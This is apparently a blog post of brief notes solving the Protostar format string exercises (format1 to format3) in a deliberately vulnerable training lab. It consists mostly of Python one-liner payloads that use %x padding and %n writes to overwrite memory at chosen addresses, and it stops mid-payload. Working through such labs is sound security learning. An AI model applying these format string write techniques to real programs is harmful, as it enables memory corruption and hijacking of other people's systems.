Posts

Showing posts from December, 2016

Exploit Exercises - Format String

Format1: Padding to last mem dump run `python -c 'print "\x38\x96\x04\x08"+"AAABB"+"%x."*143'`%x Write run `python -c 'print "\x38\x96\x04\x08"+"AAABB"+"%x."*143'`%n DMA /opt/protostar/bin/format1 `python -c 'print "CC"+"\x38\x96\x04\x08"+"AAA%142$n"'` Format2 need write value to address: POC: python -c 'print "\xe4\x96\x04\x08%42x"+"%x."*2+"%n"' > foo |Address|Value|Padding|%n DMA python -c 'print "\xe4\x96\x04\x08"+"%60u%4$n"'  |  /opt/protostar/bin/format2 Format3: write 4 byte with speacify address: POC: python -c 'print "\xf4\x96\x04\x08"+"%x"*10+"%11x%n"+"BB"+"\xf5\x96\x04\x08"+"%x"*6+"%475x%n"+"B"+"\xf6\x96\x04\x08"+"%x"*4+"%136x%n"+"B"+"\xf7\x96\x04\